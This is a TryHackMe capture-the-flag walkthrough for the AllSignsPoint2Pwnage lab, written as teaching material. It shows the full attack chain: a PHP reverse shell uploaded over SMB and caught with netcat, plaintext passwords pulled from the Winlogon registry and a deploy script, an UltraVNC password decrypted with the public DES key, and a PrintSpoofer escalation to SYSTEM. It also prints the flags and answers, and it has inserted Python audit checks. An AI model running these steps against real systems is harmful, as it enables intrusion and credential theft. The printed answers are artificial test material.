AllSignsPoint2Pwnage — TryHackMe Walkthrough
Upload a PHP reverse shell to the target server, set up a local listener and trigger the reverse connection over HTTP. User credentials and passwords are recovered, and PrintSpoofer is used for privilege escalation to reach the Administrator desktop flag. 2025-9-22 12:53:28 Author: infosecwriteups.com (view original)

Uploading a PHP reverse shell (foothold)

I grabbed a PHP reverse shell from a trusted repo and configured it with my attacking IP and port.

Next, I connected to the images$ share (which maps to the webroot) with smbclient and uploaded the shell:

# connect to the images$ share
smbclient //10.10.130.54/images$

At the smb: prompt I uploaded my file:

smb: \> put shell.php
putting file shell.php as \shell.php (0.6 kb/s) (average 0.6 kb/s)
smb: \>

With the file on the webroot, I opened a local netcat listener and triggered the PHP shell via an HTTP request:

# on my machine
nc -lnvp 4444

Then, from another terminal on my machine, I triggered the uploaded PHP over HTTP:

curl http://10.10.130.54/images/shell.php

Immediately the listener received a connection:

Listening on 0.0.0.0 4444
Connection received on 10.10.130.54 49918
SOCKET: Shell has connected! PID: 3140

On the remote shell I confirmed the user and environment:

C:\xampp\htdocs\images> whoami
desktop-997gg7d\sign

So the console session user was sign.

Question: What user is signed into the console session?

Answer: sign

I also enumerated shares from the shell to confirm the other remote-only and administrative shares.

Question: What hidden, non-standard share is only remotely accessible as an administrative account?

Answer: Installs$

Capturing User Flag

Finally, I captured the user flag from the sign desktop:

C:\Users\sign\Desktop> type user_flag.txt
thm{48u51n9_5y573m_func710n4117y_f02_fun_4nd_p20f17}

Post-exploitation

Credential discovery

Command run

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Relevant output (excerpt)

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
AutoLogonSID REG_SZ S-1-5-21-201290883-77286733-747258586-1001
LastUsedUsername REG_SZ .\sign
DefaultUsername REG_SZ .\sign
DefaultPassword REG_SZ gKY1uxHLuU1zzlI4wwdAcKUw35TPMdv7PAEE5dAFbV2NxpPJVO7eeSH
AutoAdminLogon REG_DWORD 0x1

Finding
Auto-logon was enabled (AutoAdminLogon=1), and the Winlogon key held the stored credentials for the user .\sign in plaintext. Because HKLM\SOFTWARE is readable by standard users, a DefaultPassword value stored this way is exposed to every local account; the Sysinternals Autologon tool instead keeps the auto-logon password as an LSA secret, which standard users cannot read.

Recovered password

gKY1uxHLuU1zzlI4wwdAcKUw35TPMdv7PAEE5dAFbV2NxpPJVO7eeSH


Question: What is the Users Password?

Answer: gKY1uxHLuU1zzlI4wwdAcKUw35TPMdv7PAEE5dAFbV2NxpPJVO7eeSH

Installs$ share & UltraVNC — Credential discovery

Context
Checked the Installs$ SMB share (mapped to C:\Installs) to look for deployment scripts and installer artifacts.

Command

type C:\Installs\Install_www_and_deploy.bat

Install_www_and_deploy.bat (excerpt)

@echo off
REM Shop Sign Install Script
cd C:\Installs
psexec -accepteula -nobanner -u administrator -p RCYCc3GIjM0v98HDVJ1KOuUm4xsWUxqZabeofbbpAss9KCKpYfs2rCi xampp-windows-x64-7.4.11-0-VC15-installer.exe ...
xcopy C:\Installs\simepleslide\src\* C:\xampp\htdocs\
move C:\xampp\htdocs\index.php C:\xampp\htdocs\index.php_orig
copy C:\Installs\simepleslide\src\slide.html C:\xampp\htdocs\index.html
mkdir C:\xampp\htdocs\images
UltraVNC_1_2_40_X64_Setup.exe /silent
copy ultravnc.ini "C:\Program Files\uvnc bvba\UltraVNC\ultravnc.ini" /y
copy startup.bat "c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\"
pause

Question: What is the Administrators Password?

Answer: RCYCc3GIjM0v98HDVJ1KOuUm4xsWUxqZabeofbbpAss9KCKpYfs2rCi

Question: What executable is used to run the installer with the Administrator username and password?

Answer: PsExec.exe
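As an added audit example (not part of the original write-up), the two plaintext-credential findings above, the Winlogon DefaultPassword and the psexec -u/-p line in the deploy script, can be detected from a captured `reg query` dump and a batch file. The sample inputs are constructed to mirror the page's excerpts, with placeholder strings where the real secrets were.

```python
import re

# Constructed sample in the layout `reg query ...\Winlogon` prints; the secret is a placeholder.
WINLOGON_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoLogonSID        REG_SZ       S-1-5-21-1111111111-2222222222-3333333333-1001
    LastUsedUsername    REG_SZ       .\sign
    DefaultUsername     REG_SZ       .\sign
    DefaultPassword     REG_SZ       <PLACEHOLDER_PASSWORD>
    AutoAdminLogon      REG_DWORD    0x1
"""

# Constructed sample in the shape of Install_www_and_deploy.bat; the secret is a placeholder.
DEPLOY_BAT = r"""@echo off
REM Shop Sign Install Script
cd C:\Installs
psexec -accepteula -nobanner -u administrator -p <PLACEHOLDER_PASSWORD> installer.exe
mkdir C:\xampp\htdocs\images
"""

# One value line of `reg query`: name, REG_* type, optional data.
REG_VALUE = re.compile(r"^\s*(\S+)\s+(REG_\w+)(?:\s+(.*?))?\s*$")


def parse_reg_query(text):
    """Map value name -> data for the value lines of a `reg query` dump."""
    values = {}
    for line in text.splitlines():
        m = REG_VALUE.match(line)
        if m:
            values[m.group(1)] = m.group(3) or ""
    return values


def winlogon_findings(text):
    """Flag auto-logon that keeps its password in the world-readable Winlogon key."""
    v = parse_reg_query(text)
    if v.get("AutoAdminLogon", "0x0").lower() in ("0x1", "1") and v.get("DefaultPassword"):
        return [f"AutoAdminLogon=1 with plaintext DefaultPassword for {v.get('DefaultUsername', '?')}"]
    return []


def psexec_inline_credentials(bat_text):
    """Return (line number, user) for psexec calls that pass -u/-p on the command line."""
    hits = []
    for n, line in enumerate(bat_text.splitlines(), 1):
        toks = line.split()
        low = [t.lower() for t in toks]
        if low and low[0] in ("psexec", "psexec.exe") and "-p" in low:
            user = toks[low.index("-u") + 1] if "-u" in low and low.index("-u") + 1 < len(toks) else "?"
            hits.append((n, user))
    return hits
```

Run the two checks over real `reg query` output and the contents of deployment scripts found on a share; any hit is a credential that every reader of the key or file can recover.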

Inspect UltraVNC config — Credential discovery

Locate UltraVNC configuration file

type "C:\Program Files\uvnc bvba\UltraVNC\ultravnc.ini"

Output:

[ultravnc]
passwd=B3A8F2D8BEA2F1FA70
passwd2=00B2CDC0BADCAF1397
[admin]
UseRegistry=0
SendExtraMouse=1
Secure=0

The passwd value is the VNC password, DES-encrypted with the fixed key that every VNC implementation shares and stored hex-encoded. Because that key is public, this is obfuscation rather than protection: anyone who can read ultravnc.ini can recover the password.

Decoding the UltraVNC password

Command executed on an attacker Linux host

echo -n B3A8F2D8BEA2F1FA70 | xxd -r -p | \
openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv

Output hexdump (truncated):

00000000  35 75 70 70 30 72 74 39                           |5upp0rt9|

Decoded VNC password:

5upp0rt9

Question: What is the VNC Password?

Answer: 5upp0rt9

Privilege Escalation & Root Flag Capture

Privilege enumeration
During enumeration, we found that the current user had SeImpersonatePrivilege enabled. This privilege lets a process impersonate the security context of a client that authenticates to it, and a process holding it can in practice obtain a token for another account, including SYSTEM.

Command

whoami /priv

Relevant output

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled <--
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
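The check a defender would run on the same data, added here as an example rather than taken from the write-up: parse the fixed-width `whoami /priv` table by its separator line and report enabled privileges that allow acting as another account. The sample output is constructed to match the table above; the set of high-risk privilege names is the author's choice for this example.

```python
# Constructed sample matching the fixed-width layout of `whoami /priv`.
WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
"""

# Token privileges that let their holder act as another account or as SYSTEM.
# An enabled one on a web-server or service account is an escalation risk;
# which accounts hold them is set by user-rights assignment in local security policy.
HIGH_RISK = {
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeDebugPrivilege",
    "SeTcbPrivilege", "SeLoadDriverPrivilege", "SeTakeOwnershipPrivilege",
}


def parse_whoami_priv(text):
    """Split the `whoami /priv` table into rows using the '=' separator line for column bounds."""
    lines = text.splitlines()
    sep = next(i for i, l in enumerate(lines) if l.startswith("="))
    # Each run of '=' in the separator marks one column's start and end.
    bounds, start = [], None
    for pos, ch in enumerate(lines[sep] + " "):
        if ch == "=" and start is None:
            start = pos
        elif ch != "=" and start is not None:
            bounds.append((start, pos))
            start = None
    rows = []
    for line in lines[sep + 1:]:
        if not line.strip():
            continue
        cells = [line[a:b].strip() for a, b in bounds[:-1]]
        cells.append(line[bounds[-1][0]:].strip())  # last column runs to end of line
        rows.append(dict(zip(("name", "description", "state"), cells)))
    return rows


def enabled_high_risk(rows):
    """Names of enabled privileges from HIGH_RISK, sorted for stable reporting."""
    return sorted(r["name"] for r in rows if r["state"] == "Enabled" and r["name"] in HIGH_RISK)
```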

Exploiting SeImpersonatePrivilege with PrintSpoofer

To escalate to NT AUTHORITY\SYSTEM, we leveraged the PrintSpoofer payload.

Step 1: Download PrintSpoofer

wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe

Step 2: Upload the binary to the target via SMB

smb: \> put PrintSpoofer64.exe

Step 3: Execute PrintSpoofer on the target

C:\xampp\htdocs\images>PrintSpoofer64.exe -i -c cmd

Output

[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.18362.1256]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

Capturing the Root Flag

With SYSTEM privileges, we read the Administrator desktop flag:

type "C:\Users\Administrator\Desktop\admin_flag.txt"

Flag

thm{p455w02d_c4n_83_f0und_1n_p141n_73x7_4dm1n_5c21p75}



Source: https://infosecwriteups.com/allsignspoint2pwnage-tryhackme-walkthrough-9cd07b7de282?source=rss----7b722bfd1b8d---4